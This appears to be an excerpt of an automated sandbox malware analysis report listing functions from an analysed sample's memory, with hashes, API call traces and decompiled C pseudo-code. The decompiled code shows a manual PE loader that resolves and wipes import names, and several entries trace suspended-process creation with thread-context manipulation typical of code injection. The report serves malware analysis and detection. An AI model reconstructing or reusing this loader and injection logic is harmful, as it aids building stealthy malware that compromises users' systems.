                      • Opcode Fuzzy Hash: 79f88a124a0b69b190a03fa5f34c235a6966a857f89ecb5216a90b1f742dbf1b
                      • Instruction Fuzzy Hash: A4F0FFB661010DBFEF129FD5CC41EEE7F6DEB04654F004066BB15A5060D271DA11DB54
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 004011F2, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E004011F2(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x40305c, 0, _a4); // executed
				return _t2;
			}




                      0x004011fe
                      0x00401204

                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00000000,00401553,00000208,00000000,?,0040160D,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
                      Memory Dump Source
                      • Source File: 00000003.00000002.1148966230.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.1148947137.00400000.00000002.sdmp Download File
                      • Associated: 00000003.00000002.1148981734.00402000.00000002.sdmp Download File
                      • Associated: 00000003.00000002.1149005296.00403000.00000004.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_text.jbxd
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: d935b4f51a27394032f3c67b9e1b6a96a76f042afce792340da260ee13d390f0
                      • Instruction ID: 4425f1c6487cb1303e53a5fb1f876b1ba006c7dfd0de678c3456b649a32eedb4
                      • Opcode Fuzzy Hash: d935b4f51a27394032f3c67b9e1b6a96a76f042afce792340da260ee13d390f0
                      • Instruction Fuzzy Hash: AEB01231000300EBDB019F00EF08F077F75A750701F10C030B304600B482714420EB1C
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00381D25, Relevance: 1.3, APIs: 1, Instructions: 86memoryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000003.00000002.1148913877.00380000.00000040.sdmp, Offset: 00380000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_380000_text.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: b0b6fff23bb3701b533ad5ae12780d3b05db8d0f63e38d42b121aa226cddd8d5
                      • Instruction ID: d0762d2e58834a41e72361be26aa89d13a774037de60630951f7beac8d39ebe3
                      • Opcode Fuzzy Hash: b0b6fff23bb3701b533ad5ae12780d3b05db8d0f63e38d42b121aa226cddd8d5
                      • Instruction Fuzzy Hash: 8F41E2B0A052199FDB44DFA9C5806AEFBF0FF88310F61846EE848AB301D375A941CF91
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 004015A3, Relevance: 1.3, APIs: 1, Instructions: 63memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E004015A3(intOrPtr* __ebx) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				void* __edi;
				void* _t24;
				signed int _t26;
				signed int _t27;
				signed int _t29;
				intOrPtr _t30;
				char* _t31;
				void* _t32;
				void* _t36;
				void* _t41;

				_t20 =  *((intOrPtr*)(__ebx + 4));
				_t24 = VirtualAlloc(0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ebx + 4)) + 0x3c)) + _t20 + 0x50)) + 0x00000fff & 0xfffff000, 0x1000, 4); // executed
				_t36 = _t24;
				if(_t36 == 0) {
					_v8 = 8;
				} else {
					_t26 = E0040121C(_t36,  *((intOrPtr*)(__ebx + 4)));
					_v8 = _t26;
					if(_t26 == 0) {
						_t41 =  *((intOrPtr*)(_t36 + 0x3c)) + _t36;
						_t27 = E00401398(_t36, _t41);
						_v8 = _t27;
						if(_t27 == 0) {
							_t29 = E00401495(_t41, _t36); // executed
							_v8 = _t29;
							if(_t29 == 0) {
								_t30 = E00401542( *((intOrPtr*)(__ebx)));
								_v12 = _t30;
								if(_t30 == 0) {
									_t31 = 0;
								} else {
									_v16 = _v16 & 0x00000000;
									_v20 = 0xf1c0def0;
									_t31 =  &_v20;
								}
								_t32 =  *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x28)) + _t36))(_t36, 1, _t31); // executed
								if(_t32 != 0) {
									_v8 = _v8 & 0x00000000;
								}
							}
						}
					}
				}
				return _v8;
			}

















                      0x004015a6
                      0x004015c9
                      0x004015cf
                      0x004015d3
                      0x0040163b
                      0x004015d5
                      0x004015d9
                      0x004015de
                      0x004015e3
                      0x004015e8
                      0x004015eb
                      0x004015f0
                      0x004015f5
                      0x004015fa
                      0x004015ff
                      0x00401604
                      0x00401608
                      0x0040160d
                      0x00401612
                      0x00401624
                      0x00401614
                      0x00401614
                      0x00401618
                      0x0040161f
                      0x0040161f
                      0x0040162f
                      0x00401633
                      0x00401635
                      0x00401635
                      0x00401633
                      0x00401604
                      0x004015f5
                      0x004015e3
                      0x00401648

                      APIs
                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,752AC470,004016EC,?,?,00000000), ref: 004015C9
                        • Part of subcall function 0040121C: memcpy.NTDLL(004015DE,?,?,00000000,752AC470,?,?,?,?,004015DE,00000000,?,?,?,00000000), ref: 0040125C
                        • Part of subcall function 0040121C: memcpy.NTDLL(004015DE,?,?), ref: 0040129A
                        • Part of subcall function 00401398: LoadLibraryA.KERNEL32(?), ref: 004013C5
                        • Part of subcall function 00401398: lstrlenA.KERNEL32(?,?,?,?,004015F0,?,00000000,?,?,?,00000000), ref: 004013D8
                        • Part of subcall function 00401398: memset.NTDLL ref: 004013E2
                        • Part of subcall function 00401398: GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015F0,?,00000000,?,?,?,00000000), ref: 0040142D
                        • Part of subcall function 00401398: lstrlenA.KERNEL32(00000002,?,?,?,?,004015F0,?,00000000,?,?,?,00000000), ref: 00401440
                        • Part of subcall function 00401398: memset.NTDLL ref: 0040144A
                        • Part of subcall function 00401495: VirtualProtect.KERNELBASE(00000000,?,00000004,00000000,00000000,?,?,004015FF,00000000), ref: 004014C3
                        • Part of subcall function 00401495: VirtualProtect.KERNELBASE(00000000,?,00000004,?), ref: 0040151B
                        • Part of subcall function 00401495: GetLastError.KERNEL32 ref: 00401521
                        • Part of subcall function 00401542: GetModuleFileNameW.KERNEL32(?,00000000,00000104,?,00000208,00000000,?,0040160D,?,00000000,?,00000000,?,?,?,00000000), ref: 00401560
                      Memory Dump Source
                      • Source File: 00000003.00000002.1148966230.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.1148947137.00400000.00000002.sdmp Download File
                      • Associated: 00000003.00000002.1148981734.00402000.00000002.sdmp Download File
                      • Associated: 00000003.00000002.1149005296.00403000.00000004.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_text.jbxd
                      Similarity
                      • API ID: Virtual$Protectlstrlenmemcpymemset$AddressAllocErrorFileLastLibraryLoadModuleNameProc
                      • String ID:
                      • API String ID: 3816444689-0
                      • Opcode ID: c481fc0c6816d887f64394c5b75e79c69b5566eca14fe893ad366164f62a3b16
                      • Instruction ID: 93de27251ef7a5c3cddc38c0c27dc13e4c4a5a163c12a8e24408c513e8fcc30f
                      • Opcode Fuzzy Hash: c481fc0c6816d887f64394c5b75e79c69b5566eca14fe893ad366164f62a3b16
                      • Instruction Fuzzy Hash: A7118E71900616EBDB119B69CD14BAF7BB8AF50704F1844BAE800FB2E1EB79DD018B58
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 01414161, Relevance: 1.3, APIs: 1, Instructions: 57memoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 01413ECF: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01413F6D
                        • Part of subcall function 01413ECF: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 01413F81
                        • Part of subcall function 01413ECF: CloseHandle.KERNEL32(?), ref: 01413F98
                        • Part of subcall function 01413ECF: StrRChrA.SHLWAPI(014111A9,00000000,0000005C), ref: 01413FA4
                        • Part of subcall function 01413ECF: lstrcat.KERNEL32(014111A9,0141825D), ref: 01413FDE
                        • Part of subcall function 01413ECF: FindFirstFileA.KERNELBASE(014111A9,?), ref: 01413FF4
                        • Part of subcall function 01413ECF: FindNextFileA.KERNELBASE(?,?), ref: 01414026
                        • Part of subcall function 01413ECF: StrChrA.SHLWAPI(?,0000002E), ref: 01414094
                        • Part of subcall function 01413ECF: memcpy.NTDLL(0141618C,?,00000000), ref: 014140CD
                        • Part of subcall function 01413ECF: FindNextFileA.KERNELBASE(?,?), ref: 014140E2
                        • Part of subcall function 01413ECF: CompareFileTime.KERNEL32(?,?), ref: 0141410B
                        • Part of subcall function 01413ECF: HeapFree.KERNEL32(00000000,0141618C,01418049), ref: 01414141
                        • Part of subcall function 01413ECF: HeapFree.KERNEL32(00000000,014111A9), ref: 01414151
                        • Part of subcall function 0141452D: lstrlen.KERNEL32(014111A9,014176D0,01416144,00000000,0141419B,0141618C,0141618C,?,?,?,014111A9,?,0141618C), ref: 01414536
                        • Part of subcall function 0141452D: mbstowcs.NTDLL ref: 0141455D
                        • Part of subcall function 0141452D: memset.NTDLL ref: 0141456F
                      • HeapFree.KERNEL32(00000000,0141618C,0141618C), ref: 014141B7
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: File$FindFreeHeap$NextTime$CloseCompareCreateFirstHandlelstrcatlstrlenmbstowcsmemcpymemset
                      • String ID:
                      • API String ID: 2813374552-0
                      • Opcode ID: 38cba6166b086ce8eb5c2ad51f40d496e90af9a8cdd139deb63f2cadb27d2ac9
                      • Instruction ID: 5d19dac006f03d20405f96e87ec1843f39dd114d4c8c02bfe9f2ab372ebf7436
                      • Opcode Fuzzy Hash: 38cba6166b086ce8eb5c2ad51f40d496e90af9a8cdd139deb63f2cadb27d2ac9
                      • Instruction Fuzzy Hash: 7B112B79700219EBE7109F99DC48BAD7BB8EB10365F184023E904E7178D7709A41CB24
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 014138AE, Relevance: 1.3, APIs: 1, Instructions: 46COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0141115F: RtlAllocateHeap.NTDLL(00000000,?,01413BA9), ref: 0141116B
                      • memset.NTDLL ref: 014138CD
                        • Part of subcall function 01413789: memset.NTDLL ref: 014137AB
                        • Part of subcall function 01413789: memcpy.NTDLL(00000218,01414E62,00000100,?,00010003,?,?,00000318,00000008), ref: 01413826
                        • Part of subcall function 01413789: NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 0141387D
                        • Part of subcall function 01413789: RtlNtStatusToDosError.NTDLL(00000000), ref: 01413880
                        • Part of subcall function 01413789: GetLastError.KERNEL32(?,00000318,00000008), ref: 0141389E
                        • Part of subcall function 01411174: HeapFree.KERNEL32(00000000,?,01413C0E), ref: 01411180
                        • Part of subcall function 01413633: memset.NTDLL ref: 01413659
                        • Part of subcall function 01413633: memcpy.NTDLL ref: 01413681
                        • Part of subcall function 01413633: GetLastError.KERNEL32(00000010,00000218,01414E3D,00000100,?,00000318,00000008), ref: 01413698
                        • Part of subcall function 01413633: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,01414E3D,00000100), ref: 0141377B
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Error$Lastmemset$Heapmemcpy$AllocateContextFreeStatusThread
                      • String ID:
                      • API String ID: 1324952413-0
                      • Opcode ID: 212682c493a7cf4ae4d8e54172a10fa41ba57822ea3f729c2063184a6dccab17
                      • Instruction ID: 595e598d7c4cf9d10cc8e78d08efd4f6eeb115c980d6e02b1ef492ed0414da17
                      • Opcode Fuzzy Hash: 212682c493a7cf4ae4d8e54172a10fa41ba57822ea3f729c2063184a6dccab17
                      • Instruction Fuzzy Hash: C601AD715023096BD321AF2AD841B9B7BE9AB55730F00862FF98896365D7B0A90587A0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Non-executed Functions

                      Function 01414A4D, Relevance: 7.6, APIs: 5, Instructions: 59stringthreadtimeCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0141115F: RtlAllocateHeap.NTDLL(00000000,?,01413BA9), ref: 0141116B
                      • GetCurrentThreadId.KERNEL32(?,?,?,01414AE0,?,0141763C,00000000,01412DC5,00000750), ref: 01414A85
                      • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01414AE0,?,0141763C,00000000,01412DC5,00000750), ref: 01414A91
                      • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01414A9F
                      • PathFindExtensionA.SHLWAPI(00000000), ref: 01414AB3
                      • lstrcpy.KERNEL32(00000000), ref: 01414ABA
                        • Part of subcall function 01411174: HeapFree.KERNEL32(00000000,?,01413C0E), ref: 01411180
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: FileHeapTime$AllocateCurrentExtensionFindFreeNamePathSystemTempThreadlstrcpy
                      • String ID:
                      • API String ID: 1355202529-0
                      • Opcode ID: 39c17c9fb16b13f8d1e1035eb2ef70ed2250bcfa90eb0dfd7ec0bd794435576c
                      • Instruction ID: 067d25e80c8910238d79384b4d606978ed135eaf766df8735bb7ce78ae202c7b
                      • Opcode Fuzzy Hash: 39c17c9fb16b13f8d1e1035eb2ef70ed2250bcfa90eb0dfd7ec0bd794435576c
                      • Instruction Fuzzy Hash: 4701B9B36012157FE7605FB98C88E6B7E6CAF5468470F0126BB02D3219DBB0DD0447B4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 014129A4, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                      Download Yara Rule
                      APIs
                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01417614,014116B0,?,01417614), ref: 014129B3
                      • GetVersion.KERNEL32(?,01417614), ref: 014129C2
                      • GetCurrentProcessId.KERNEL32(?,01417614), ref: 014129D1
                      • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01417614), ref: 014129EA
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Process$CreateCurrentEventOpenVersion
                      • String ID:
                      • API String ID: 845504543-0
                      • Opcode ID: 622ff6da3a20cda2a73faf2bb82c593f0c9e35480b174fc837df5645685c5be1
                      • Instruction ID: c342ad11ea549cf4609ea0f36a8713af2336588c4697de7b0b3ba1191cd0267c
                      • Opcode Fuzzy Hash: 622ff6da3a20cda2a73faf2bb82c593f0c9e35480b174fc837df5645685c5be1
                      • Instruction Fuzzy Hash: BFF017B16813219BE7719B6CBC09B553FA4A708762F224956E619C62ECD7F0C441CB58
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 01413B27, Relevance: 3.0, APIs: 2, Instructions: 37nativeCOMMON
                      Download Yara Rule
                      APIs
                      • memset.NTDLL ref: 01413B46
                      • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 01413B5E
                        • Part of subcall function 01413CB2: NtReadVirtualMemory.NTDLL(?,00000004,0141244E,0141244E,00000000,00000000,?,014122DE,00000000,0141244E,0141244E,00000004,?,00000000,00000000,0141605C), ref: 01413CD0
                        • Part of subcall function 01413CB2: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01413CDF
                        • Part of subcall function 01413CB2: SetLastError.KERNEL32(00000000,?,014122DE,00000000,0141244E,0141244E,00000004,?,00000000,00000000,0141605C,00000000), ref: 01413CE6
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Error$InformationLastMemoryProcessQueryReadStatusVirtualmemset
                      • String ID:
                      • API String ID: 4262940379-0
                      • Opcode ID: 09c5ad6d71bb1f91f1705237dc1bd2e341f1b8f1d622ef1146421d1f9d3a8f7d
                      • Instruction ID: fac16547f79a60a899d703e82f08c7646c2864d2162d5cb4d4b77eecd5e44e65
                      • Opcode Fuzzy Hash: 09c5ad6d71bb1f91f1705237dc1bd2e341f1b8f1d622ef1146421d1f9d3a8f7d
                      • Instruction Fuzzy Hash: BDF062B290021CBAEF20DE91CC05FDEBF7CAB14750F0040A6BA08E2195E370DB44CBA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 01413D84, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: lstrcmplstrlen
                      • String ID: ~
                      • API String ID: 898299967-1707062198
                      • Opcode ID: aa4741a1b8036d1f99d2d9b2fcffcee1c1e7e3ffd88ab73214eda7f62e7a4d04
                      • Instruction ID: e1a7513276d712ac63ea05fe4c5bc627fe25ad3e82a3e934f92d4b8bab95b222
                      • Opcode Fuzzy Hash: aa4741a1b8036d1f99d2d9b2fcffcee1c1e7e3ffd88ab73214eda7f62e7a4d04
                      • Instruction Fuzzy Hash: A701A7B25053159BD720CF6DD8805277FA8FB45671F45096FE90597238C7B1E8078BA1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 01414F58, Relevance: .1, Instructions: 77COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                      • Instruction ID: fbe2dcddc5608dd4e6a16889ea401692cc35dbba972066c2200d210e08997d31
                      • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                      • Instruction Fuzzy Hash: D021FB729002059FCB10EFA9C8C08A7BFA5FF85350B068459DD168F259D730F915C7E0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 01412D8C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108stringCOMMON
                      Download Yara Rule
                      APIs
                      • memset.NTDLL ref: 01412DAA
                      • CoInitializeEx.OLE32(00000000,00000002), ref: 01412DB5
                      • PathFindExtensionW.SHLWAPI(00000000), ref: 01412DD0
                      • lstrcpyW.KERNEL32(00000000,01418224), ref: 01412DE5
                      • lstrlen.KERNEL32(01417614,?,?,?,?,?,?,?,?,?,?,01411853,?), ref: 01412E02
                      • lstrcpyW.KERNEL32(00000000,014184B8), ref: 01412E33
                        • Part of subcall function 0141115F: RtlAllocateHeap.NTDLL(00000000,?,01413BA9), ref: 0141116B
                      • wsprintfW.USER32 ref: 01412E6A
                      • ShellExecuteExW.SHELL32(0000003C), ref: 01412E9F
                      • CoUninitialize.OLE32 ref: 01412EB3
                        • Part of subcall function 01411174: HeapFree.KERNEL32(00000000,?,01413C0E), ref: 01411180
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Heaplstrcpy$AllocateExecuteExtensionFindFreeInitializePathShellUninitializelstrlenmemsetwsprintf
                      • String ID: <
                      • API String ID: 3500879692-4251816714
                      • Opcode ID: b219993dc4d9f79fc743d894c76a0171d4b16e81d2d64af3cb0f3ed7328ea4ad
                      • Instruction ID: 3fb9c7bf6f09e41127190a47850a0317090ca4921f27db60e1d1597ece960e74
                      • Opcode Fuzzy Hash: b219993dc4d9f79fc743d894c76a0171d4b16e81d2d64af3cb0f3ed7328ea4ad
                      • Instruction Fuzzy Hash: 9831A3B1D01225ABDB21ABB5DC48D9FBF6CEF55750B15401AFA05E3229DBB4CA00CBE4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00401398, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89librarystringloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00401398(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















                      0x00401398
                      0x00401398
                      0x0040139f
                      0x004013a4
                      0x004013ac
                      0x0040148a
                      0x00401492
                      0x00401492
                      0x004013b2
                      0x004013b4
                      0x004013b9
                      0x00000000
                      0x00000000
                      0x004013c1
                      0x004013c1
                      0x004013c5
                      0x004013cb
                      0x004013d1
                      0x00000000
                      0x00000000
                      0x004013e2
                      0x004013e7
                      0x004013e9
                      0x004013ec
                      0x004013f1
                      0x004013f9
                      0x004013f9
                      0x004013fc
                      0x00401400
                      0x00401470
                      0x00401470
                      0x00401473
                      0x00401478
                      0x00000000
                      0x00000000
                      0x00401488
                      0x00000000
                      0x00401489
                      0x00401406
                      0x0040140a
                      0x00000000
                      0x0040140c
                      0x0040140c
                      0x00401414
                      0x00401423
                      0x00401423
                      0x0040140e
                      0x0040140e
                      0x0040140e
                      0x00401425
                      0x00401425
                      0x0040142d
                      0x00401433
                      0x00401439
                      0x00000000
                      0x00000000
                      0x0040143d
                      0x0040144a
                      0x0040144f
                      0x0040144f
                      0x0040145a
                      0x0040145d
                      0x00401460
                      0x00401464
                      0x00000000
                      0x00401466
                      0x00000000
                      0x00401466
                      0x00401468
                      0x00401468
                      0x00000000
                      0x00401468
                      0x004013f3
                      0x004013f7
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004013f7
                      0x00401480
                      0x00000000

                      APIs
                      • LoadLibraryA.KERNEL32(?), ref: 004013C5
                      • lstrlenA.KERNEL32(?,?,?,?,004015F0,?,00000000,?,?,?,00000000), ref: 004013D8
                      • memset.NTDLL ref: 004013E2
                      • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015F0,?,00000000,?,?,?,00000000), ref: 0040142D
                      • lstrlenA.KERNEL32(00000002,?,?,?,?,004015F0,?,00000000,?,?,?,00000000), ref: 00401440
                      • memset.NTDLL ref: 0040144A
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1148966230.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.1148947137.00400000.00000002.sdmp Download File
                      • Associated: 00000003.00000002.1148981734.00402000.00000002.sdmp Download File
                      • Associated: 00000003.00000002.1149005296.00403000.00000004.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_text.jbxd
                      Similarity
                      • API ID: lstrlenmemset$AddressLibraryLoadProc
                      • String ID: ~
                      • API String ID: 1986585659-1707062198
                      • Opcode ID: 7137cf6fc4849f07640f0138802fdcf82f6608b0a35124494955186490b9465b
                      • Instruction ID: 9cfa27cb60d09a088f87bbc70088036487facf95daeb84733a0c8259cf0c0f36
                      • Opcode Fuzzy Hash: 7137cf6fc4849f07640f0138802fdcf82f6608b0a35124494955186490b9465b
                      • Instruction Fuzzy Hash: 2E3158716043028BD7149F19DD80B6B77E8AF44388F14043EED81EB3B2E778E8048B6A
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 014149E7, Relevance: 9.0, APIs: 6, Instructions: 40fileCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileW.KERNEL32(01417614,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01414A00
                      • GetLastError.KERNEL32(?,01412D15,00000000,01417614,?,00001FD1,00000000,00000000,?,?,01411841,?,?), ref: 01414A0D
                      • WriteFile.KERNEL32(00000000,?,00001000,01417614,00000000), ref: 01414A23
                      • SetEndOfFile.KERNEL32(00000000,?,01412D15,00000000,01417614,?,00001FD1,00000000,00000000,?,?,01411841,?,?), ref: 01414A2E
                      • GetLastError.KERNEL32(?,01412D15,00000000,01417614,?,00001FD1,00000000,00000000,?,?,01411841,?,?), ref: 01414A36
                      • CloseHandle.KERNEL32(00000000), ref: 01414A3F
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: File$ErrorLast$CloseCreateHandleWrite
                      • String ID:
                      • API String ID: 2256172639-0
                      • Opcode ID: fcefd6a196670f8dd9ab4655ae71df5f51b2b5d0609eaa6c0438a163621be591
                      • Instruction ID: f7e4bd37621db7a61d9f002c674db521e7e49931374c48150f1ec9a9c05b5e8d
                      • Opcode Fuzzy Hash: fcefd6a196670f8dd9ab4655ae71df5f51b2b5d0609eaa6c0438a163621be591
                      • Instruction Fuzzy Hash: B4F04932100124BBC7309A65AC08EAB7F7DEB467F1B064115FA0AD21A8D7708805D7A4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0141139A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73processmemoryCOMMON
                      Download Yara Rule
                      APIs
                      • memset.NTDLL ref: 014113BA
                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 014113F9
                      • GetLastError.KERNEL32 ref: 01411429
                      • HeapFree.KERNEL32(00000000,?), ref: 0141143B
                        • Part of subcall function 0141225F: memset.NTDLL ref: 01412282
                        • Part of subcall function 0141225F: ResumeThread.KERNELBASE(?,00000000,0141244E,CCCCFEEB,00000000,0141244E,0141244E,00000004,?,00000000,00000000,0141605C,00000000), ref: 0141230D
                        • Part of subcall function 0141225F: WaitForSingleObject.KERNEL32(00000064), ref: 0141231B
                        • Part of subcall function 0141225F: SuspendThread.KERNELBASE(?), ref: 0141232E
                        • Part of subcall function 0141225F: GetLastError.KERNEL32(00000000,0141244E,0141244E,00000004,?,00000000,00000000,0141605C,00000000), ref: 0141239A
                        • Part of subcall function 0141225F: ResumeThread.KERNELBASE(?), ref: 014123A5
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Thread$ErrorLastResumememset$CreateFreeHeapObjectProcessSingleSuspendWait
                      • String ID: D
                      • API String ID: 1692557788-2746444292
                      • Opcode ID: 1d6f1699cd2a41501ac06ffdfb99ec79583acf338987c4604ab8fda2320a4dc8
                      • Instruction ID: 7696a41662b4426b2342b016aa6f2f22d92356979424920b0a2bb393856a9626
